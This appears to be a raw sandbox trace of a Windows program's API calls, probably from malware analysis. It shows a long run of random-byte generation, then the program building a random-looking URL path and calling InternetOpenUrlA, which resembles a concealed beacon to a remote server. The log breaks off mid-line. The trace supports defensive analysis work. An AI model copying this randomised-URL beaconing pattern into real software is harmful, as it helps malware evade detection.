[0170.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1722d, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a1722d) returned 0x0 [0170.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1725b, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a1725b) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.617] GetProcessHeap () returned 0x440000 [0170.617] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0170.617] lstrcpyA (in: lpString1=0x4726f0, lpString2="" | out: lpString1="") returned="" [0170.617] lstrcatA (in: lpString1="", lpString2="/lS8ipjtravtUc49Zwr2Bdf3aCun9rmJGfw0icPfCt6b/siw7Vl7as32rUbLjh0o2jv9e1bBSatPeffUhimSv5vg3k/jgYrf3t6Hgklfh1tsm3k8hKsi/" | out: lpString1="/lS8ipjtravtUc49Zwr2Bdf3aCun9rmJGfw0icPfCt6b/siw7Vl7as32rUbLjh0o2jv9e1bBSatPeffUhimSv5vg3k/jgYrf3t6Hgklfh1tsm3k8hKsi/") returned="/lS8ipjtravtUc49Zwr2Bdf3aCun9rmJGfw0icPfCt6b/siw7Vl7as32rUbLjh0o2jv9e1bBSatPeffUhimSv5vg3k/jgYrf3t6Hgklfh1tsm3k8hKsi/" [0170.617] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0170.617] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="/lS8ipjtravtUc49Zwr2Bdf3aCun9rmJGfw0icPfCt6b/siw7Vl7as32rUbLjh0o2jv9e1bBSatPeffUhimSv5vg3k/jgYrf3t6Hgklfh1tsm3k8hKsi/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0170.617] GetProcessHeap () returned 0x440000 [0170.617] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0170.617] GetProcessHeap () returned 0x440000 [0170.617] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17200 | out: hHeap=0x440000) returned 1 [0170.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0170.618] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0170.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0170.618] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 